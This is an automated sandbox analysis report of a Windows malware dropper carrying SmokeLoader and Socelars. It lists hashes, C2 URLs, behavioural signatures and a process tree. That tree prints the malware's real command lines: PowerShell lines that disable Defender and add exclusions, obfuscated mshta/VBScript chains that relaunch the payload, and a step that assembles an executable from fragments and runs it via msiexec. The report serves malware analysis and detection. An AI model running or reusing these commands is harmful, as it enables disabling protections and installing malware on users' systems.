Analysis

max time kernel: 13s
max time network: 151s
platform: windows10_x64
resource: win10-en-20211208
submitted: 26/12/2021, 18:41

Static task: static1
Behavioral task: behavioral1
Sample: 2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe
Resource: win7-en-20211208
General

Target: 2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe
Size: 4.4MB
MD5: 244f3fcae34a514dd3e78f3d4d72f92a
SHA1: 5ac41859cefd7ad0536b36c7e82f33e702514fe2
SHA256: 2992c4b00c678a438b0b935e09e0fd341a44c46fe0dd2f18621570f55133e4df
SHA512: 245ab74d77796452086c2874af05c7c1d51e7c552c47a655388575cb4add160b743082c4db84f35f2755b2caa78b9b4af2577f1785a4919308fefea20acdc53f
Malware Config

Extracted: socelars
- http://www.iyiqian.com/
- http://www.hbgents.top/
- http://www.rsnzhy.com/
- http://www.efxety.top/

Extracted: smokeloader 2020
- http://directorycart.com/upload/
- http://tierzahnarzt.at/upload/
- http://streetofcards.com/upload/
- http://ycdfzd.com/upload/
- http://successcoachceo.com/upload/
- http://uhvu.cn/upload/
- http://japanarticle.com/upload/
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4180 | 3348 | rundll32.exe | 115

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload (2 IoCs)
resource | yara_rule
behavioral2/files/0x000500000001ab2f-171.dat | family_socelars
behavioral2/files/0x000500000001ab2f-208.dat | family_socelars
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
resource | yara_rule
behavioral2/files/0x000500000001ab21-123.dat | aspack_v212_v242
behavioral2/files/0x000500000001ab21-125.dat | aspack_v212_v242
behavioral2/files/0x000500000001ab22-122.dat | aspack_v212_v242
behavioral2/files/0x000500000001ab22-127.dat | aspack_v212_v242
behavioral2/files/0x000500000001ab24-130.dat | aspack_v212_v242
behavioral2/files/0x000500000001ab24-131.dat | aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE (17 IoCs)
pid | Process
1828 | setup_installer.exe
1104 | setup_install.exe
2484 | Sun0792bfe25c4e6f.exe
2864 | Sun07426f49ca3.exe
952 | Sun07853f394a6f2.exe
3672 | Sun07689b7dd63a1a2e.exe
3680 | Sun074812abe11c68090.exe
3244 | Sun0705fdd6f3fa.exe
1572 | Sun07aef696b81cc09ee.exe
1632 | Sun07fbac34efb13666.exe
2192 | Sun074dcdeb3534e450.exe
2584 | Sun079abff5ef.exe
2944 | Sun07b9107c074617.exe
2596 | Sun076d6b9f10493573.exe
2220 | Sun074812abe11c68090.tmp
4016 | Sun074812abe11c68090.exe
1048 | Sun074812abe11c68090.tmp

Loads dropped DLL (8 IoCs)
pid | Process | entries
1104 | setup_install.exe | 6
2220 | Sun074812abe11c68090.tmp | 1
1048 | Sun074812abe11c68090.tmp | 1

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 (1 TTP)

Looks up external IP address via web service (8 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
65 | freegeoip.app
67 | freegeoip.app
70 | freegeoip.app
107 | ipinfo.io
108 | ipinfo.io
109 | ipinfo.io
24 | ip-api.com
63 | freegeoip.app

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Drops file in Windows directory (1 IoC)
description | ioc | Process
File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | WerFault.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (15 IoCs)
pid | pid_target | Process | procid_target
4020 | 3244 | WerFault.exe | 88
3076 | 1104 | WerFault.exe | 70
3984 | 3244 | WerFault.exe | 88
2004 | 3244 | WerFault.exe | 88
3116 | 3244 | WerFault.exe | 88
4288 | 3244 | WerFault.exe | 88
4568 | 2584 | WerFault.exe | 98
4220 | 3244 | WerFault.exe | 88
4152 | 3244 | WerFault.exe | 88
4456 | 3244 | WerFault.exe | 88
4400 | 3244 | WerFault.exe | 88
780 | 3884 | WerFault.exe | 161
5044 | 2972 | WerFault.exe | 142
4456 | 2972 | WerFault.exe | 142
4292 | 2972 | WerFault.exe | 142

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Sun07fbac34efb13666.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Sun07fbac34efb13666.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Sun07fbac34efb13666.exe

Kills process with taskkill (2 IoCs)
pid | Process
2900 | taskkill.exe
4128 | taskkill.exe

Script User-Agent (1 IoC)
Uses user-agent string associated with script host/environment.
description | flow | ioc
HTTP User-Agent header | 29 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses (55 IoCs)
pid | Process | entries
1632 | Sun07fbac34efb13666.exe | 2
4020 | WerFault.exe | 16
3076 | WerFault.exe | 16
736 | powershell.exe | 1
1036 | powershell.exe | 1
3076 | WerFault.exe | 2
3984 | WerFault.exe | 17
Suspicious use of AdjustPrivilegeToken (46 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3672 | Sun07689b7dd63a1a2e.exe
Token: SeDebugPrivilege | 2864 | Sun07426f49ca3.exe
Token: SeCreateTokenPrivilege | 2584 | Sun079abff5ef.exe
Token: SeAssignPrimaryTokenPrivilege | 2584 | Sun079abff5ef.exe
Token: SeLockMemoryPrivilege | 2584 | Sun079abff5ef.exe
Token: SeIncreaseQuotaPrivilege | 2584 | Sun079abff5ef.exe
Token: SeMachineAccountPrivilege | 2584 | Sun079abff5ef.exe
Token: SeTcbPrivilege | 2584 | Sun079abff5ef.exe
Token: SeSecurityPrivilege | 2584 | Sun079abff5ef.exe
Token: SeTakeOwnershipPrivilege | 2584 | Sun079abff5ef.exe
Token: SeLoadDriverPrivilege | 2584 | Sun079abff5ef.exe
Token: SeSystemProfilePrivilege | 2584 | Sun079abff5ef.exe
Token: SeSystemtimePrivilege | 2584 | Sun079abff5ef.exe
Token: SeProfSingleProcessPrivilege | 2584 | Sun079abff5ef.exe
Token: SeIncBasePriorityPrivilege | 2584 | Sun079abff5ef.exe
Token: SeCreatePagefilePrivilege | 2584 | Sun079abff5ef.exe
Token: SeCreatePermanentPrivilege | 2584 | Sun079abff5ef.exe
Token: SeBackupPrivilege | 2584 | Sun079abff5ef.exe
Token: SeRestorePrivilege | 2584 | Sun079abff5ef.exe
Token: SeShutdownPrivilege | 2584 | Sun079abff5ef.exe
Token: SeDebugPrivilege | 2584 | Sun079abff5ef.exe
Token: SeAuditPrivilege | 2584 | Sun079abff5ef.exe
Token: SeSystemEnvironmentPrivilege | 2584 | Sun079abff5ef.exe
Token: SeChangeNotifyPrivilege | 2584 | Sun079abff5ef.exe
Token: SeRemoteShutdownPrivilege | 2584 | Sun079abff5ef.exe
Token: SeUndockPrivilege | 2584 | Sun079abff5ef.exe
Token: SeSyncAgentPrivilege | 2584 | Sun079abff5ef.exe
Token: SeEnableDelegationPrivilege | 2584 | Sun079abff5ef.exe
Token: SeManageVolumePrivilege | 2584 | Sun079abff5ef.exe
Token: SeImpersonatePrivilege | 2584 | Sun079abff5ef.exe
Token: SeCreateGlobalPrivilege | 2584 | Sun079abff5ef.exe
Token: 31 | 2584 | Sun079abff5ef.exe
Token: 32 | 2584 | Sun079abff5ef.exe
Token: 33 | 2584 | Sun079abff5ef.exe
Token: 34 | 2584 | Sun079abff5ef.exe
Token: 35 | 2584 | Sun079abff5ef.exe
Token: SeRestorePrivilege | 3076 | WerFault.exe
Token: SeBackupPrivilege | 3076 | WerFault.exe
Token: SeRestorePrivilege | 4020 | WerFault.exe
Token: SeBackupPrivilege | 4020 | WerFault.exe
Token: SeBackupPrivilege | 4020 | WerFault.exe
Token: SeDebugPrivilege | 1036 | powershell.exe
Token: SeDebugPrivilege | 736 | powershell.exe
Token: SeDebugPrivilege | 4020 | WerFault.exe
Token: SeDebugPrivilege | 3076 | WerFault.exe
Token: SeDebugPrivilege | 3984 | WerFault.exe
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target | entries
PID 3116 wrote to memory of 1828 | 3116 | 2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe | 69 | 3
PID 1828 wrote to memory of 1104 | 1828 | setup_installer.exe | 70 | 3
PID 1104 wrote to memory of 1992 | 1104 | setup_install.exe | 73 | 3
PID 1104 wrote to memory of 1140 | 1104 | setup_install.exe | 74 | 3
PID 1140 wrote to memory of 736 | 1140 | cmd.exe | 75 | 3
PID 1992 wrote to memory of 1036 | 1992 | cmd.exe | 76 | 3
PID 1104 wrote to memory of 1648 | 1104 | setup_install.exe | 77 | 3
PID 1104 wrote to memory of 3996 | 1104 | setup_install.exe | 78 | 3
PID 1104 wrote to memory of 2844 | 1104 | setup_install.exe | 79 | 3
PID 1104 wrote to memory of 3220 | 1104 | setup_install.exe | 80 | 3
PID 1104 wrote to memory of 3216 | 1104 | setup_install.exe | 81 | 3
PID 1104 wrote to memory of 856 | 1104 | setup_install.exe | 82 | 3
PID 1104 wrote to memory of 408 | 1104 | setup_install.exe | 84 | 3
PID 1104 wrote to memory of 1124 | 1104 | setup_install.exe | 83 | 3
PID 1648 wrote to memory of 2484 | 1648 | cmd.exe | 95 | 3
PID 1104 wrote to memory of 688 | 1104 | setup_install.exe | 94 | 3
PID 1104 wrote to memory of 1912 | 1104 | setup_install.exe | 93 | 3
PID 3996 wrote to memory of 2864 | 3996 | cmd.exe | 92 | 2
PID 2844 wrote to memory of 952 | 2844 | cmd.exe | 91 | 3
PID 1104 wrote to memory of 964 | 1104 | setup_install.exe | 85 | 3
PID 1104 wrote to memory of 2364 | 1104 | setup_install.exe | 90 | 3
PID 3220 wrote to memory of 3672 | 3220 | cmd.exe | 86 | 2
Processes

C:\Users\Admin\AppData\Local\Temp\2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\2992C4B00C678A438B0B935E09E0FD341A44C46FE0DD2.exe"
  - Suspicious use of WriteProcessMemory
  PID: 3116

  C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID: 1828

    C:\Users\Admin\AppData\Local\Temp\7zS427EF636\setup_install.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\7zS427EF636\setup_install.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      PID: 1104

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        - Suspicious use of WriteProcessMemory
        PID: 1992

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 1036

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        - Suspicious use of WriteProcessMemory
        PID: 1140

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 736
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun0792bfe25c4e6f.exe
        - Suspicious use of WriteProcessMemory
        PID: 1648

        C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun0792bfe25c4e6f.exe
          Command line: Sun0792bfe25c4e6f.exe
          - Executes dropped EXE
          PID: 2484

          C:\Users\Admin\Pictures\Adobe Films\deolLfBLVWWZhjEXo3SGrkJn.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\deolLfBLVWWZhjEXo3SGrkJn.exe"
            PID: 4904

          C:\Users\Admin\Pictures\Adobe Films\XGd9xmpEaEmn66nGdN1QTt5z.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\XGd9xmpEaEmn66nGdN1QTt5z.exe"
            PID: 2972

            C:\Windows\SysWOW64\WerFault.exe
              Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 664
              - Program crash
              PID: 5044

            C:\Windows\SysWOW64\WerFault.exe
              Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 680
              - Program crash
              PID: 4456

            C:\Windows\SysWOW64\WerFault.exe
              Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 640
              - Program crash
              PID: 4292

          C:\Users\Admin\Pictures\Adobe Films\cdsFHRwWn8gYws59jYRHw9lb.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\cdsFHRwWn8gYws59jYRHw9lb.exe"
            PID: 4196

          C:\Users\Admin\Pictures\Adobe Films\KFfotjwUdwi0GFVFsJeDM02T.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\KFfotjwUdwi0GFVFsJeDM02T.exe"
            PID: 4856

          C:\Users\Admin\Pictures\Adobe Films\CtJuePy1MyQk4W0fAOB7rE5q.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\CtJuePy1MyQk4W0fAOB7rE5q.exe"
            PID: 4288

          C:\Users\Admin\Pictures\Adobe Films\pOwxTgYu2mKTgRe1OiTr9Lwe.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\pOwxTgYu2mKTgRe1OiTr9Lwe.exe"
            PID: 4872

          C:\Users\Admin\Pictures\Adobe Films\ePGhwMzZ7_bWKGTNIn7y9eom.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\ePGhwMzZ7_bWKGTNIn7y9eom.exe"
            PID: 2000

          C:\Users\Admin\Pictures\Adobe Films\2oxIk_KXlBd8OExoW9Xyb3WX.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\2oxIk_KXlBd8OExoW9Xyb3WX.exe"
            PID: 1272

          C:\Users\Admin\Pictures\Adobe Films\2xNJlMOtxbrck8lCJlXt9jJz.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\2xNJlMOtxbrck8lCJlXt9jJz.exe"
            PID: 4340

            C:\Users\Admin\AppData\Local\Temp\7zS3DE6.tmp\Install.exe
              Command line: .\Install.exe
              PID: 4988

              C:\Users\Admin\AppData\Local\Temp\7zS4A69.tmp\Install.exe
                Command line: .\Install.exe /S /site_id "525403"
                PID: 4600

          C:\Users\Admin\Pictures\Adobe Films\JHat5sZc4cNKfO1RLKKYD76t.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\JHat5sZc4cNKfO1RLKKYD76t.exe"
            PID: 356

          C:\Users\Admin\Pictures\Adobe Films\B1ltl3yLoT5Gb98yErXql8ci.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\B1ltl3yLoT5Gb98yErXql8ci.exe"
            PID: 3884

            C:\Windows\SysWOW64\WerFault.exe
              Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 400
              - Program crash
              PID: 780

          C:\Users\Admin\Pictures\Adobe Films\JlxTFx8xMVyRGqvfG0LjAsSf.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\JlxTFx8xMVyRGqvfG0LjAsSf.exe"
            PID: 2196

          C:\Users\Admin\Pictures\Adobe Films\_Kz1s_LXylKrdPcR7D95PXNx.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\_Kz1s_LXylKrdPcR7D95PXNx.exe"
            PID: 2544

            C:\Users\Admin\Pictures\Adobe Films\_Kz1s_LXylKrdPcR7D95PXNx.exe
              Command line: "C:\Users\Admin\Pictures\Adobe Films\_Kz1s_LXylKrdPcR7D95PXNx.exe"
              PID: 4172

          C:\Users\Admin\Pictures\Adobe Films\HtWtgehaHrFRM6AXPyOi8Vk8.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\HtWtgehaHrFRM6AXPyOi8Vk8.exe"
            PID: 3676
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun07426f49ca3.exe
        - Suspicious use of WriteProcessMemory
        PID: 3996

        C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07426f49ca3.exe
          Command line: Sun07426f49ca3.exe
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          PID: 2864

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun07853f394a6f2.exe
        - Suspicious use of WriteProcessMemory
        PID: 2844

        C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07853f394a6f2.exe
          Command line: Sun07853f394a6f2.exe
          - Executes dropped EXE
          PID: 952

          C:\Users\Admin\Pictures\Adobe Films\g8Ea5sTtb4AGzNUcMWWY3LW0.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\g8Ea5sTtb4AGzNUcMWWY3LW0.exe"
            PID: 4728

          C:\Users\Admin\Pictures\Adobe Films\DjVuFsS7eSS9aKu0hxkmYxkg.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\DjVuFsS7eSS9aKu0hxkmYxkg.exe"
            PID: 4332

          C:\Users\Admin\Pictures\Adobe Films\el_JhtsjZqV8Ofskkum4sQdi.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\el_JhtsjZqV8Ofskkum4sQdi.exe"
            PID: 4368

          C:\Users\Admin\Pictures\Adobe Films\ZASI6_un6Lp8XU0mwUdzNjXg.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\ZASI6_un6Lp8XU0mwUdzNjXg.exe"
            PID: 1940

          C:\Users\Admin\Pictures\Adobe Films\FhCHvwomyjXLvMN3TwM0jkTH.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\FhCHvwomyjXLvMN3TwM0jkTH.exe"
            PID: 4908

          C:\Users\Admin\Pictures\Adobe Films\aVPnkV6ppQ7Pi8SA7WzdfkQH.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\aVPnkV6ppQ7Pi8SA7WzdfkQH.exe"
            PID: 512

            C:\Users\Admin\AppData\Local\Temp\7zS37DB.tmp\Install.exe
              Command line: .\Install.exe
              PID: 1328

              C:\Users\Admin\AppData\Local\Temp\7zS42E7.tmp\Install.exe
                Command line: .\Install.exe /S /site_id "525403"
                PID: 4224

          C:\Users\Admin\Pictures\Adobe Films\ehrdrtNELSEtd7q0K66tgfEx.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\ehrdrtNELSEtd7q0K66tgfEx.exe"
            PID: 3172

          C:\Users\Admin\Pictures\Adobe Films\I4q4PPuyMW7UrYa77TghPnoq.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\I4q4PPuyMW7UrYa77TghPnoq.exe"
            PID: 3844

          C:\Users\Admin\Pictures\Adobe Films\i6WtrzMGtUVnlWaVNY_6JxIp.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\i6WtrzMGtUVnlWaVNY_6JxIp.exe"
            PID: 2952

          C:\Users\Admin\Pictures\Adobe Films\qx0h3N0rvz0s08lgVKY_nIuk.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\qx0h3N0rvz0s08lgVKY_nIuk.exe"
            PID: 4840

            C:\Users\Admin\Pictures\Adobe Films\qx0h3N0rvz0s08lgVKY_nIuk.exe
              Command line: "C:\Users\Admin\Pictures\Adobe Films\qx0h3N0rvz0s08lgVKY_nIuk.exe"
              PID: 4444

          C:\Users\Admin\Pictures\Adobe Films\CZXdiaq2wabk2YWB6ciyYwto.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\CZXdiaq2wabk2YWB6ciyYwto.exe"
            PID: 2456

          C:\Users\Admin\Pictures\Adobe Films\eh27mwD6bMTOnrbkwIUtCklL.exe
            Command line: "C:\Users\Admin\Pictures\Adobe Films\eh27mwD6bMTOnrbkwIUtCklL.exe"
            PID: 4752
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun07689b7dd63a1a2e.exe
        - Suspicious use of WriteProcessMemory
        PID: 3220

        C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07689b7dd63a1a2e.exe
          Command line: Sun07689b7dd63a1a2e.exe
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          PID: 3672

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun07aef696b81cc09ee.exe
        PID: 3216

        C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07aef696b81cc09ee.exe
          Command line: Sun07aef696b81cc09ee.exe
          - Executes dropped EXE
          PID: 1572

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun07fbac34efb13666.exe
        PID: 856

        C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07fbac34efb13666.exe
          Command line: Sun07fbac34efb13666.exe
          - Executes dropped EXE
          - Checks SCSI registry key(s)
          - Suspicious behavior: EnumeratesProcesses
          PID: 1632

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun0705fdd6f3fa.exe /mixone
        PID: 1124

        C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun0705fdd6f3fa.exe
          Command line: Sun0705fdd6f3fa.exe /mixone
          - Executes dropped EXE
          PID: 3244

          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 656
            - Drops file in Windows directory
            - Program crash
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 4020

          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 672
            - Program crash
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 3984

          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 772
            - Program crash
            PID: 2004

          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 808
            - Program crash
            PID: 3116

          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 840
            - Program crash
            PID: 4288

          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 896
            - Program crash
            PID: 4220

          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 1064
            - Program crash
            PID: 4152

          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 1264
            - Program crash
            PID: 4456

          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 1304
            - Program crash
            PID: 4400
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun074812abe11c68090.exe
        PID: 408

        C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe
          Command line: Sun074812abe11c68090.exe
          - Executes dropped EXE
          PID: 3680

          C:\Users\Admin\AppData\Local\Temp\is-TLE4F.tmp\Sun074812abe11c68090.tmp
            Command line: "C:\Users\Admin\AppData\Local\Temp\is-TLE4F.tmp\Sun074812abe11c68090.tmp" /SL5="$30134,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            PID: 2220

            C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe" /SILENT
              - Executes dropped EXE
              PID: 4016

              C:\Users\Admin\AppData\Local\Temp\is-55PUN.tmp\Sun074812abe11c68090.tmp
                Command line: "C:\Users\Admin\AppData\Local\Temp\is-55PUN.tmp\Sun074812abe11c68090.tmp" /SL5="$50056,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074812abe11c68090.exe" /SILENT
                - Executes dropped EXE
                - Loads dropped DLL
                PID: 1048

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun076d6b9f10493573.exe
        PID: 964

        C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun076d6b9f10493573.exe
          Command line: Sun076d6b9f10493573.exe
          - Executes dropped EXE
          PID: 2596

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun074dcdeb3534e450.exe
        PID: 2364

        C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun074dcdeb3534e450.exe
          Command line: Sun074dcdeb3534e450.exe
          - Executes dropped EXE
          PID: 2192

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun079abff5ef.exe
        PID: 1912

        C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun079abff5ef.exe
          Command line: Sun079abff5ef.exe
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          PID: 2584

          C:\Windows\SysWOW64\cmd.exe
            Command line: cmd.exe /c taskkill /f /im chrome.exe
            PID: 1272

            C:\Windows\SysWOW64\taskkill.exe
              Command line: taskkill /f /im chrome.exe
              - Kills process with taskkill
              PID: 2900

          C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 1664
            - Program crash
            PID: 4568
      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c Sun07b9107c074617.exe
        PID: 688

        C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe
          Command line: Sun07b9107c074617.exe
          - Executes dropped EXE
          PID: 2944

          C:\Windows\SysWOW64\mshta.exe
            Command line: "C:\Windows\System32\mshta.exe" VBSCRIpt: CloSE ( cREatEobJECt( "wsCRIpT.shElL" ). run( "CMd.exE /q /C CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe"" ..\nU82.eXE && staRT ..\NU82.ExE -pfpj1T6lr~GKuX &IF """" =="""" for %e iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe"" ) do taskkill /f -im ""%~nxe"" ", 0 ,tRUE ) )
            PID: 1080

            C:\Windows\SysWOW64\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /q /C CoPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe" ..\nU82.eXE &&staRT ..\NU82.ExE -pfpj1T6lr~GKuX &IF "" =="" for %e iN ("C:\Users\Admin\AppData\Local\Temp\7zS427EF636\Sun07b9107c074617.exe" ) do taskkill /f -im "%~nxe"
              PID: 3388

              C:\Users\Admin\AppData\Local\Temp\nU82.eXE
                Command line: ..\NU82.ExE -pfpj1T6lr~GKuX
                PID: 3812

                C:\Windows\SysWOW64\mshta.exe
                  Command line: "C:\Windows\System32\mshta.exe" VBSCRIpt: CloSE ( cREatEobJECt( "wsCRIpT.shElL" ). run( "CMd.exE /q /C CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\nU82.eXE"" ..\nU82.eXE && staRT ..\NU82.ExE -pfpj1T6lr~GKuX &IF ""-pfpj1T6lr~GKuX "" =="""" for %e iN ( ""C:\Users\Admin\AppData\Local\Temp\nU82.eXE"" ) do taskkill /f -im ""%~nxe"" ", 0 ,tRUE ) )
                  PID: 4208

                  C:\Windows\SysWOW64\cmd.exe
                    Command line: "C:\Windows\System32\cmd.exe" /q /C CoPY /Y "C:\Users\Admin\AppData\Local\Temp\nU82.eXE" ..\nU82.eXE &&staRT ..\NU82.ExE -pfpj1T6lr~GKuX &IF "-pfpj1T6lr~GKuX " =="" for %e iN ("C:\Users\Admin\AppData\Local\Temp\nU82.eXE" ) do taskkill /f -im "%~nxe"
                    PID: 4928

                C:\Windows\SysWOW64\mshta.exe
                  Command line: "C:\Windows\System32\mshta.exe" vbscrIPT: CLOSE(cREATeOBJecT ( "wSCRIpT.ShELl" ). run ("cmd /q /R echo FZm4VC:\Users\Admin\AppData\Local\Tempg5i> UX2~UVnN.VM2 & eChO | sET /p = ""MZ"" > 4LNjycCw.Z2 & coPy /Y /b 4lNjyCCw.Z2 +I8PJbEWl.S +2PhmN.E8 + 5Fn2PWY8.H + F3QYhGW.Jz + NXKZ.hO + UX2~UVNN.vM2 ..\vFeGMw.qLW & DEL /Q *& STArt msiexec.exe -y ..\vFEGMW.QlW " , 0 ,trUE) )
                  PID: 4616

                  C:\Windows\SysWOW64\cmd.exe
